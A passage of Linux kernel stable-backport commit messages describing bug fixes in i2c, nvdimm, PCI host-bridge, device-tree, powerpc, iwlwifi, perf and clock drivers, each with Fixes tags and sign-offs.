[<c0668530>] (i2c_del_adapter) from [<bf0110ec>] (i2c_imx_remove+0x44/0x164 [i2c_imx])
[<bf0110a8>] (i2c_imx_remove [i2c_imx]) from [<c051a838>] (platform_drv_remove+0x2c/0x44)
[<c051a80c>] (platform_drv_remove) from [<c05183d8>] (__device_release_driver+0x90/0x12c)
[<c0518348>] (__device_release_driver) from [<c051849c>] (device_release_driver+0x28/0x34)
[<c0518474>] (device_release_driver) from [<c0517150>] (unbind_store+0x80/0x104)
[<c05170d0>] (unbind_store) from [<c0516520>] (drv_attr_store+0x28/0x34)
[<c05164f8>] (drv_attr_store) from [<c0298acc>] (sysfs_kf_write+0x50/0x54)
[<c0298a7c>] (sysfs_kf_write) from [<c029801c>] (kernfs_fop_write+0x100/0x214)
[<c0297f1c>] (kernfs_fop_write) from [<c0220130>] (__vfs_write+0x34/0x120)
[<c02200fc>] (__vfs_write) from [<c0221088>] (vfs_write+0xa8/0x170)
[<c0220fe0>] (vfs_write) from [<c0221e74>] (SyS_write+0x4c/0xa8)
[<c0221e28>] (SyS_write) from [<c0108a20>] (ret_fast_syscall+0x0/0x1c)
Signed-off-by: Vladimir Zapolskiy <vladimir_zapolskiy@mentor.com>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 399c168ab5 upstream.
We found a bug that i2c transfer sometimes failed on 3066a board with
stabel-4.8, the con register would be updated by uninitialized tuning
value, it made the i2c transfer failed.
So give the tuning value to be zero during rk3x_i2c_v0_calc_timings.
Signed-off-by: David Wu <david.wu@rock-chips.com>
Tested-by: Andy Yan <andy.yan@rock-chips.com>
Reviewed-by: Douglas Anderson <dianders@chromium.org>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e046114af5 upstream.
nvdimm_clear_poison cleared the user-visible badblocks, and sent
commands to the NVDIMM to clear the areas marked as 'poison', but it
neglected to clear the same areas from the internal poison_list which is
used to marshal ARS results before sorting them by namespace. As a
result, once on-demand ARS functionality was added:
37b137f nfit, libnvdimm: allow an ARS scrub to be triggered on demand
A scrub triggered from either sysfs or an MCE was found to be adding
stale entries that had been cleared from gendisk->badblocks, but were
still present in nvdimm_bus->poison_list. Additionally, the stale entries
could be triggered into producing stale disk->badblocks by simply disabling
and re-enabling the namespace or region.
This adds the missing step of clearing poison_list entries when clearing
poison, so that it is always in sync with badblocks.
Fixes: 37b137f ("nfit, libnvdimm: allow an ARS scrub to be triggered on demand")
Signed-off-by: Vishal Verma <vishal.l.verma@intel.com>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 13f392ebc3 upstream.
On ARM/ARM64 architectures, PCI IO ports are emulated through memory mapped
IO, by reserving a chunk of virtual address space starting at PCI_IOBASE
and by mapping the PCI host bridges memory address space driving PCI IO
cycles to it.
PCI host bridge drivers that enable downstream PCI IO cycles map the host
bridge memory address responding to PCI IO cycles to the fixed virtual
address space through the pci_remap_iospace() API.
This means that if the pci_remap_iospace() function fails, the
corresponding host bridge PCI IO resource must be considered invalid, in
that there is no way for the kernel to actually drive PCI IO transactions
if the memory addresses responding to PCI IO cycles cannot be mapped into
the CPU virtual address space.
The PCI tegra host bridge driver adds the PCI IO resource retrieved from
firmware to the host bridge resource windows even if the
pci_remap_iospace() call fails; this is an actual bug in that the PCI host
bridge would consider the PCI IO resource valid (and possibly assign it to
downstream devices) even if the kernel was not able to map the PCI host
bridge memory address driving IO cycle to the CPU virtual address space (ie
pci_remap_iospace() failures).
Add the PCI host bridge driver pci_remap_iospace() failure path and do not
add the corresponding PCI host bridge PCI IO resources retrieved through
firmware when the pci_remap_iospace() function call fails, fixing the
issue.
Fixes: e6e9f471f5 ("PCI: tegra: Use generic pci_remap_iospace() rather than ARM32-specific one")
Signed-off-by: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
CC: Thierry Reding <treding@nvidia.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bcd7b7186f upstream.
On ARM/ARM64 architectures, PCI IO ports are emulated through memory mapped
IO, by reserving a chunk of virtual address space starting at PCI_IOBASE
and by mapping the PCI host bridges memory address space driving PCI IO
cycles to it.
PCI host bridge drivers that enable downstream PCI IO cycles map the host
bridge memory address responding to PCI IO cycles to the fixed virtual
address space through the pci_remap_iospace() API.
This means that if the pci_remap_iospace() function fails, the
corresponding host bridge PCI IO resource must be considered invalid, in
that there is no way for the kernel to actually drive PCI IO transactions
if the memory addresses responding to PCI IO cycles cannot be mapped into
the CPU virtual address space.
The PCI designware host bridge driver does not remove the PCI IO resource
from the host bridge resource windows if the pci_remap_iospace() call
fails; this is an actual bug in that the PCI host bridge would consider the
PCI IO resource valid (and possibly assign it to downstream devices) even
if the kernel was not able to map the PCI host bridge memory address
driving IO cycle to the CPU virtual address space (ie pci_remap_iospace()
failures).
Fix the PCI host bridge driver pci_remap_iospace() failure path, by
destroying the PCI host bridge PCI IO resources retrieved through firmware
when the pci_remap_iospace() function call fails, therefore preventing the
kernel from adding the respective PCI IO resource to the list of PCI host
bridge valid resources, fixing the issue.
Fixes: cbce790059 ("PCI: designware: Make driver arch-agnostic")
Signed-off-by: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
CC: Jingoo Han <jingoohan1@gmail.com>
CC: Pratyush Anand <pratyush.anand@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 53f4f7ee28 upstream.
On ARM/ARM64 architectures, PCI IO ports are emulated through memory mapped
IO, by reserving a chunk of virtual address space starting at PCI_IOBASE
and by mapping the PCI host bridges memory address space driving PCI IO
cycles to it.
PCI host bridge drivers that enable downstream PCI IO cycles map the host
bridge memory address responding to PCI IO cycles to the fixed virtual
address space through the pci_remap_iospace() API.
This means that if the pci_remap_iospace() function fails, the
corresponding host bridge PCI IO resource must be considered invalid, in
that there is no way for the kernel to actually drive PCI IO transactions
if the memory addresses responding to PCI IO cycles cannot be mapped into
the CPU virtual address space.
The PCI versatile host bridge driver does not remove the PCI IO resource
from the host bridge resource windows if the pci_remap_iospace() call
fails; this is an actual bug in that the PCI host bridge would consider the
PCI IO resource valid (and possibly assign it to downstream devices) even
if the kernel was not able to map the PCI host bridge memory address
driving IO cycle to the CPU virtual address space (ie pci_remap_iospace()
failures).
Fix the PCI host bridge driver pci_remap_iospace() failure path, by
destroying the PCI host bridge PCI IO resources retrieved through firmware
when the pci_remap_iospace() function call fails, therefore preventing the
kernel from adding the respective PCI IO resource to the list of PCI host
bridge valid resources, fixing the issue.
Fixes: b7e78170ef ("PCI: versatile: Add DT-based ARM Versatile PB PCIe host driver")
Signed-off-by: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
CC: Rob Herring <robh@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 43281ede01 upstream.
On ARM/ARM64 architectures, PCI IO ports are emulated through memory mapped
IO, by reserving a chunk of virtual address space starting at PCI_IOBASE
and by mapping the PCI host bridges memory address space driving PCI IO
cycles to it.
PCI host bridge drivers that enable downstream PCI IO cycles map the host
bridge memory address responding to PCI IO cycles to the fixed virtual
address space through the pci_remap_iospace() API.
This means that if the pci_remap_iospace() function fails, the
corresponding host bridge PCI IO resource must be considered invalid, in
that there is no way for the kernel to actually drive PCI IO transactions
if the memory addresses responding to PCI IO cycles cannot be mapped into
the CPU virtual address space.
The PCI common host bridge driver does not remove the PCI IO resource from
the host bridge resource windows if the pci_remap_iospace() call fails;
this is an actual bug in that the PCI host bridge would consider the PCI IO
resource valid (and possibly assign it to downstream devices) even if the
kernel was not able to map the PCI host bridge memory address driving IO
cycle to the CPU virtual address space (ie pci_remap_iospace() failures).
Fix the PCI host bridge driver pci_remap_iospace() failure path, by
destroying the PCI host bridge PCI IO resources retrieved through firmware
when the pci_remap_iospace() function call fails, therefore preventing the
kernel from adding the respective PCI IO resource to the list of PCI host
bridge valid resources, fixing the issue.
Fixes: 4e64dbe226 ("PCI: generic: Expose pci_host_common_probe() for use by other drivers")
Signed-off-by: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit db047f8a93 upstream.
On ARM/ARM64 architectures, PCI IO ports are emulated through memory mapped
IO, by reserving a chunk of virtual address space starting at PCI_IOBASE
and by mapping the PCI host bridge's memory address space driving PCI IO
cycles to it.
PCI host bridge drivers that enable downstream PCI IO cycles map the host
bridge memory address responding to PCI IO cycles to the fixed virtual
address space through the pci_remap_iospace() API.
This means that if the pci_remap_iospace() function fails, the
corresponding host bridge PCI IO resource must be considered invalid, in
that there is no way for the kernel to actually drive PCI IO transactions
if the memory addresses responding to PCI IO cycles cannot be mapped into
the CPU virtual address space.
The PCI aardvark host bridge driver does not remove the PCI IO resource
from the host bridge resource windows if the pci_remap_iospace() call
fails; this is an actual bug in that the PCI host bridge would consider the
PCI IO resource valid (and possibly assign it to downstream devices) even
if the kernel was not able to map the PCI host bridge memory address
driving IO cycle to the CPU virtual address space (ie pci_remap_iospace()
failures).
Fix the PCI host bridge driver pci_remap_iospace() failure path, by
destroying the PCI host bridge PCI IO resources retrieved through firmware
when the pci_remap_iospace() function call fails, therefore preventing the
kernel from adding the respective PCI IO resource to the list of PCI host
bridge valid resources, fixing the issue.
Fixes: 8c39d71036 ("PCI: aardvark: Add Aardvark PCI host controller driver")
Signed-off-by: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
CC: Thomas Petazzoni <thomas.petazzoni@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5e8c873270 upstream.
On ARM/ARM64 architectures, PCI IO ports are emulated through memory mapped
IO, by reserving a chunk of virtual address space starting at PCI_IOBASE
and by mapping the PCI host bridges memory address space driving PCI IO
cycles to it.
PCI host bridge drivers that enable downstream PCI IO cycles map the host
bridge memory address responding to PCI IO cycles to the fixed virtual
address space through the pci_remap_iospace() API.
This means that if the pci_remap_iospace() function fails, the
corresponding host bridge PCI IO resource must be considered invalid, in
that there is no way for the kernel to actually drive PCI IO transactions
if the memory addresses responding to PCI IO cycles cannot be mapped into
the CPU virtual address space.
The PCI rcar host bridge driver does not remove the PCI IO resource from
the host bridge resource windows if the pci_remap_iospace() call fails;
this is an actual bug in that the PCI host bridge would consider the PCI IO
resource valid (and possibly assign it to downstream devices) even if the
kernel was not able to map the PCI host bridge memory address driving IO
cycle to the CPU virtual address space (ie pci_remap_iospace() failures).
Fix the PCI host bridge driver pci_remap_iospace() failure path, by
destroying the PCI host bridge PCI IO resources retrieved through firmware
when the pci_remap_iospace() function call fails, therefore preventing the
kernel from adding the respective PCI IO resource to the list of PCI host
bridge valid resources, fixing the issue.
Fixes: 5d2917d469 ("PCI: rcar: Convert to DT resource parsing API")
Signed-off-by: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
CC: Phil Edworthy <phil.edworthy@renesas.com>
CC: Simon Horman <horms+renesas@verge.net.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0b965a13ad upstream.
Commit b8d368caa8 ("ARM: dts: omap3: overo: remove unneded unit names
in display nodes") removed the unit names for all Overo display nodes
that didn't have a reg property.
But the display in arch/arm/boot/dts/omap3-overo-common-lcd35.dtsi does
have a reg property so the correct fix was to make the unit name match
the value of the reg property, instead of removing it.
This patch fixes the following DTC warning for boards using this dtsi:
"ocp/spi@48098000/display has a reg or ranges property, but no unit name"
Fixes: b8d368caa8 ("ARM: dts: omap3: overo: remove unneded unit names in display nodes")
Signed-off-by: Javier Martinez Canillas <javier@osg.samsung.com>
Signed-off-by: Tony Lindgren <tony@atomide.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c4ad72560d upstream.
The ethernet version in the earlier RealView EB variants is
LAN91C111 and not LAN9118 according to ARM DUI 0303E
"RealView Emulation Baseboard User Guide" page 3-57.
Make sure that this is used for the base variant of the board.
As the DT bindings for LAN91C111 does not specify any power
supplies, these need to be deleted from the DTS file.
Fixes: 2440d29d2a ("ARM: dts: realview: support all the RealView EB board variants")
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c53beb47f6 upstream.
The BCM958625HR board has 2GB of RAM available. Increase the amount
from 512MB to 2GB and add the device type to the memory entry.
Fixes: 9a4865d42f ("ARM: dts: NSP: Specify RAM amount for BCM958625HR board")
Signed-off-by: Jon Mason <jon.mason@broadcom.com>
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ca26475bf0 upstream.
The commit 9bf448c66d ("ARM: pxa: use generic gpio operation instead of
gpio register") from Oct 17, 2011, leads to the following static checker
warning:
arch/arm/mach-pxa/spitz_pm.c:172 spitz_charger_wakeup()
warn: double left shift '!gpio_get_value(SPITZ_GPIO_KEY_INT)
<< (1 << ((SPITZ_GPIO_KEY_INT) & 31))'
As Dan reported, the value is shifted three times :
- once by gpio_get_value(), which returns either 0 or BIT(gpio)
- once by the shift operation '<<'
- a last time by GPIO_bit(gpio) which is BIT(gpio)
Therefore the calculation lead to a chained or operator of :
- (1 << gpio) << (1 << gpio) = (2^gpio)^gpio = 2 ^ (gpio * gpio)
It is be sheer luck the former statement works, only because each gpio
used is strictly smaller than 6, and therefore 2^(gpio^2) never
overflows a 32 bits value, and because it is used as a boolean value to
check a gpio activation.
As the xxx_charger_wakeup() functions are used as a true/false detection
mechanism, take that opportunity to change their prototypes from integer
return value to boolean one.
Fixes: 9bf448c66d ("ARM: pxa: use generic gpio operation instead of
gpio register")
Reported-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: Joe Perches <joe@perches.com>
Signed-off-by: Robert Jarzmik <robert.jarzmik@free.fr>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9ba63e3cc8 upstream.
Since its initial commit, the driver is buggy for multiple interrupts
handling. The translation from the former lubbock.c file was not
complete, and might stall all interrupt handling when multiple
interrupts occur.
This is especially true when inside the interrupt handler and if a new
interrupt comes and is not handled, leaving the output line still held,
and not creating a transition as the GPIO block behind would expect to
trigger another cplds_irq_handler() call.
For the record, the hardware is working as follows.
The interrupt mechanism relies on :
- one status register
- one mask register
Let's suppose the input irq lines are called :
- i_sa1111
- i_lan91x
- i_mmc_cd
Let's suppose the status register for each irq line is called :
- status_sa1111
- status_lan91x
- status_mmc_cd
Let's suppose the interrupt mask for each irq line is called :
- irqen_sa1111
- irqen_lan91x
- irqen_mmc_cd
Let's suppose the output irq line, connected to GPIO0 is called :
- o_gpio0
The behavior is as follows :
- o_gpio0 = not((status_sa1111 & irqen_sa1111) |
(status_lan91x & irqen_lan91x) |
(status_mmc_cd & irqen_mmc_cd))
=> this is a N-to-1 NOR gate and multiple AND gates
- irqen_* is exactly as programmed by a write to the FPGA
- status_* behavior is governed by a bi-stable D flip-flop
=> on next FPGA clock :
- if i_xxx is high, status_xxx becomes 1
- if i_xxx is low, status_xxx remains as it is
- if software sets status_xxx to 0, the D flip-flop is reset
=> status_xxx becomes 0
=> on next FPGA clock cycle, if i_xxx is high, status_xxx becomes
1 again
Fixes: fc9e38c0f4 ("ARM: pxa: lubbock: use new pxa_cplds driver")
Reported-by: Russell King <rmk+kernel@armlinux.org.uk>
Signed-off-by: Robert Jarzmik <robert.jarzmik@free.fr>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6b8cb66a6a upstream.
On some CPUs like the 8xx, _PAGE_RW hence _PAGE_WRITE is defined
as 0 and _PAGE_RO has to be set when a page is not writable
_PAGE_RO is defined by default in pte-common.h, however BOOK3S/64
doesn't include that file so _PAGE_RO has to be defined explicitly
in book3s/64/pgtable.h
Fixes: a7b9f671f2 ("powerpc32: adds handling of _PAGE_RO")
Signed-off-by: Christophe Leroy <christophe.leroy@c-s.fr>
Reviewed-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 11b7e154b1 upstream.
When we merge two contiguous partitions whose signatures are marked
NVRAM_SIG_FREE, We need update prev's length and checksum, then write it
to nvram, not cur's. So lets fix this mistake now.
Also use memset instead of strncpy to set the partition's name. It's
more readable if we want to fill up with duplicate chars .
Fixes: fa2b4e54d4 ("powerpc/nvram: Improve partition removal")
Signed-off-by: Pan Xinhui <xinhui.pan@linux.vnet.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b0f16b4698 upstream.
giveup_all() causes FPU/VMX/VSX facilities to be disabled in a threads
MSR. If the thread performing the giveup was transactional, the kernel
must record which facilities were in use before the giveup as the
thread must have these facilities re-enabled on return to userspace.
>From process.c:
/*
* This is called if we are on the way out to userspace and the
* TIF_RESTORE_TM flag is set. It checks if we need to reload
* FP and/or vector state and does so if necessary.
* If userspace is inside a transaction (whether active or
* suspended) and FP/VMX/VSX instructions have ever been enabled
* inside that transaction, then we have to keep them enabled
* and keep the FP/VMX/VSX state loaded while ever the transaction
* continues. The reason is that if we didn't, and subsequently
* got a FP/VMX/VSX unavailable interrupt inside a transaction,
* we don't know whether it's the same transaction, and thus we
* don't know which of the checkpointed state and the transactional
* state to use.
*/
Calling check_if_tm_restore_required() will set TIF_RESTORE_TM and
save the MSR if needed.
Fixes: c208505 ("powerpc: create giveup_all()")
Signed-off-by: Cyril Bur <cyrilbur@gmail.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dc16b553c9 upstream.
Comment from arch/powerpc/kernel/process.c:967:
If userspace is inside a transaction (whether active or
suspended) and FP/VMX/VSX instructions have ever been enabled
inside that transaction, then we have to keep them enabled
and keep the FP/VMX/VSX state loaded while ever the transaction
continues. The reason is that if we didn't, and subsequently
got a FP/VMX/VSX unavailable interrupt inside a transaction,
we don't know whether it's the same transaction, and thus we
don't know which of the checkpointed state and the ransactional
state to use.
restore_math() restore_fp() and restore_altivec() currently may not
restore the registers. It doesn't appear that this is more serious
than a performance penalty. If the math registers aren't restored the
userspace thread will still be run with the facility disabled.
Userspace will not be able to read invalid values. On the first access
it will take an facility unavailable exception and the kernel will
detected an active transaction, at which point it will abort the
transaction. There is the possibility for a pathological case
preventing any progress by transactions, however, transactions
are never guaranteed to make progress.
Fixes: 70fe3d9 ("powerpc: Restore FPU/VEC/VSX if previously used")
Signed-off-by: Cyril Bur <cyrilbur@gmail.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0d667f72b2 upstream.
In _scsih_io_done() we test if the ioc->logging_level does _not_ have
the MPT_DEBUG_REPLY bit set and if it hasn't we print the debug
messages. This unfortunately is the wrong way around.
Note, the actual bug is older than af0094115 but this commit removed the
CONFIG_SCSI_MPT3SAS_LOGGING Kconfig option which hid the bug.
Fixes: af0094115 'mpt2sas, mpt3sas: Remove SCSI_MPTXSAS_LOGGING entry from Kconfig'
Signed-off-by: Johannes Thumshirn <jthumshirn@suse.de>
Acked-by: Chaitra P B <chaitra.basappa@broadcom.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 06ad11be7a upstream.
The R_PIO device node is missing #interrupt-cells, which causes
interrupt parsing to fail to match it as a valid interrupt controller.
Add #interrupt-cells to it. Also remove the unnecesary #address-cells
and #size-cells.
Fixes: 1ac56a6da9 ("ARM: dts: sun9i: Add A80 R_PIO pin controller device
node")
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Maxime Ripard <maxime.ripard@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 75cfe338b8 upstream.
We were assigning the return value of iwl_mvm_ctdp_command() to a
variable, but never checking it. If this command fails, we should not
allow the interface up process to proceed, since it is potentially
dangerous to ignore thermal management requirements.
Fixes: commit 5c89e7bc55 ("iwlwifi: mvm: add registration to cooling device")
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9a73a7d24d upstream.
On default queue we will not receive frame release notification,
but the BAR itself.
Upon receiving the BAR driver should look at the NSSN and adjust
window accordingly.
Fixes: b915c10174 ("iwlwifi: mvm: add reorder buffer per queue")
Signed-off-by: Sara Sharon <sara.sharon@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a0315dea90 upstream.
When a STA is removed in DQA mode, if no traffic went through
its reserved queue, the txq continues to be marked as
reserved and no STA can use it.
Make sure that in such a case the reserved queue is marked
as free when the STA is removed.
Fixes: commit 24afba7690 ("iwlwifi: mvm: support bss dynamic alloc/dealloc of queues")
Signed-off-by: Liad Kaufman <liad.kaufman@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ca3b9c6b6d upstream.
Since the SCD_QUEUE_CFG command was introduced the driver
calls iwl_trans_txq_enable_cfg() with a NULL for scd_cfg
parameter.
This makes the transport avoid writing to the SCD pointers,
since it can cause races with firmware, which is also accessing
the registers.
The transport only updates the write pointer in that case.
Fix a wrong call to iwl_trans_txq_enable() which caused a
scd_cfg parameter to be sent to transport, resulting with an
access to SCD registers.
Fixes: 58f2cc57dc ("iwlwifi: mvm: support dqa-mode scd queue redirection")
Signed-off-by: Sara Sharon <sara.sharon@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7585c35463 upstream.
In iwl_mvm_rx_tx_cmd_single(), when checking if a given TID is
aggregated, the driver doesn't check whether or not the queue
itself can be aggregated. For example, a management queue might
be marked as aggregated if TID 0 is aggregated on a (different)
data queue.
Make sure that mgmt frames are sent with TID IWL_TID_NON_QOS,
and in this way make sure no mixups of this sort happen.
Fixes: commit 24afba7690 ("iwlwifi: mvm: support bss dynamic alloc/dealloc of queues")
Signed-off-by: Liad Kaufman <liad.kaufman@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a6c934b364 upstream.
In 9000 family products we added an option to let the OEM fuse the
mac address via registers. If these registers are zeroed we use the OTP
address instead. Make sure that the address provided by the OEM is valid
and, if not, fall back to the OTP address as well.
Fixes: commit 17c867bfe8 ("iwlwifi: add support for getting HW address from CSR")
Signed-off-by: Haim Dreyfuss <haim.dreyfuss@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 432746f8e0 upstream.
When we call symbol__fixup_duplicate() we use algorithms to pick the
"best" symbols for cases where there are various functions/aliases to an
address, and those check zero size symbols, which, before calling
symbol__fixup_end() are _all_ symbols in a just parsed kallsyms file.
So first fixup the end, then fixup the duplicates.
Found while trying to figure out why 'perf test vmlinux' failed, see the
output of 'perf test -v vmlinux' to see cases where the symbols picked
as best for vmlinux don't match the ones picked for kallsyms.
Cc: Anton Blanchard <anton@samba.org>
Cc: Adrian Hunter <adrian.hunter@intel.com>
Cc: David Ahern <dsahern@gmail.com>
Cc: Jiri Olsa <jolsa@kernel.org>
Cc: Masami Hiramatsu <mhiramat@kernel.org>
Cc: Namhyung Kim <namhyung@kernel.org>
Cc: Wang Nan <wangnan0@huawei.com>
Fixes: 694bf407b0 ("perf symbols: Add some heuristics for choosing the best duplicate symbol")
Link: http://lkml.kernel.org/n/tip-rxqvdgr0mqjdxee0kf8i2ufn@git.kernel.org
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9a6ad25b5a upstream.
When the --hierarchy option is used, each entry has its own hpp_list to
show the result. But it is not updating the width of each column for
perf-top. The perf-report command has no problem since it resets it
during header display.
$ sudo perf top --hierarchy --stdio
PerfTop: 160 irqs/sec kernel:38.8% exact: 100.0%
[4000Hz cycles:pp], (all, 12 CPUs)
----------------------------------------------------------------------
52.32% perf
24.74% [.] __symbols__insert
5.62% [.] rb_next
5.14% [.] dso__load_sym
Move the code into hists__fprintf() so that it can be called always.
Also it'd be better to put similar code together.
Signed-off-by: Namhyung Kim <namhyung@kernel.org>
Tested-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Cc: Andi Kleen <andi@firstfloor.org>
Cc: Jiri Olsa <jolsa@kernel.org>
Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
Fixes: 1b2dbbf41a ("perf hists: Use own hpp_list for hierarchy mode")
Link: http://lkml.kernel.org/r/20160913074552.13284-5-namhyung@kernel.org
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 25b8592e91 upstream.
'make -C tools/perf build-test' is failing with below log for poewrpc.
In file included from /tmp/tmp.3eEwmGlYaF/perf-4.8.0-rc4/tools/perf/perf.h:15:0,
from util/cpumap.h:8,
from util/env.c:1:
/tmp/tmp.3eEwmGlYaF/perf-4.8.0-rc4/tools/perf/perf-sys.h:23:56:
fatal error: ../../arch/powerpc/include/uapi/asm/unistd.h: No such file or directory
compilation terminated.
I bisected it and found it's failing from commit ad430729ae ("Remove:
kernel unistd*h files from perf's MANIFEST, not used").
Header file '../../arch/powerpc/include/uapi/asm/unistd.h' is included
only for powerpc in tools/perf/perf-sys.h.
By looking closly at commit history, I found little weird thing:
Commit f2d9cae9ea ("perf powerpc: Use uapi/unistd.h to fix build
error") replaced 'asm/unistd.h' with 'uapi/asm/unistd.h'
Commit d2709c7ce4 ("perf: Make perf build for x86 with UAPI
disintegration applied") removes all arch specific 'uapi/asm/unistd.h'
for all archs and adds generic <asm/unistd.h>.
Commit f0b9abfb04 ("Merge branch 'linus' into perf/core") again
includes 'uapi/asm/unistd.h' for powerpc. Don't know how exactly this
happened as this change is not part of commit also.
Signed-off-by: Ravi Bangoria <ravi.bangoria@linux.vnet.ibm.com>
Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Link: http://lkml.kernel.org/r/1472630591-5089-1-git-send-email-ravi.bangoria@linux.vnet.ibm.com
Fixes: ad430729ae ("Remove: kernel unistd*h files from perf's MANIFEST, not used")
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d9ea48bc4e upstream.
Milian reported that the event group on TUI shows duplicated overhead.
This was due to a bug on calculating hpp->buf position. The
hpp_advance() was called from __hpp__slsmg_color_printf() on TUI but
it's already called from the hpp__call_print_fn macro in __hpp__fmt().
The end result is that the print function returns number of bytes it
printed but the buffer advanced twice of the length.
This is generally not a problem since it doesn't need to access the
buffer again. But with event group, overhead needs to be printed
multiple times and hist_entry__snprintf_alignment() tries to fill the
space with buffer after it printed. So it (brokenly) showed the last
overhead again.
The bug was there from the beginning, but I think it's only revealed
when the alignment function was added.
Reported-by: Milian Wolff <milian.wolff@kdab.com>
Signed-off-by: Namhyung Kim <namhyung@kernel.org>
Cc: Andi Kleen <andi@firstfloor.org>
Cc: Jiri Olsa <jolsa@kernel.org>
Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
Fixes: 89fee70943 ("perf hists: Do column alignment on the format iterator")
Link: http://lkml.kernel.org/r/20160912061958.16656-2-namhyung@kernel.org
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2cf9a57811 upstream.
clk-divider uses clk_readl()/clk_writel() everywhere, except in
clk_divider_round_rate(), where plain readl() is used. Change this to
clk_readl(), as it makes a difference on powerpc.
Fixes: e6d5e7d90b ("clk-divider: Fix READ_ONLY when divider > 1")
Signed-off-by: Geert Uytterhoeven <geert+renesas@glider.be>
Reviewed-by: James Hogan <james.hogan@imgtec.com>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3174b0c9a6 upstream.
This patch reverts commit 023bd7166b ("clk: skip unnecessary
set_phase if nothing to do"), fixing two problems:
* in some SoCs, the hardware phase delay depends on the rate ratio of
the clock and its parent. So, changing this ratio may imply to set
new hardware values, even if the logical delay is the same.
* when the delay was the same as previously, an error was returned.
Signed-off-by: Jean-Francois Moine <moinejf@free.fr>
Fixes: 023bd7166b ("clk: skip unnecessary set_phase if nothing to do")
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f155d15b64 upstream.
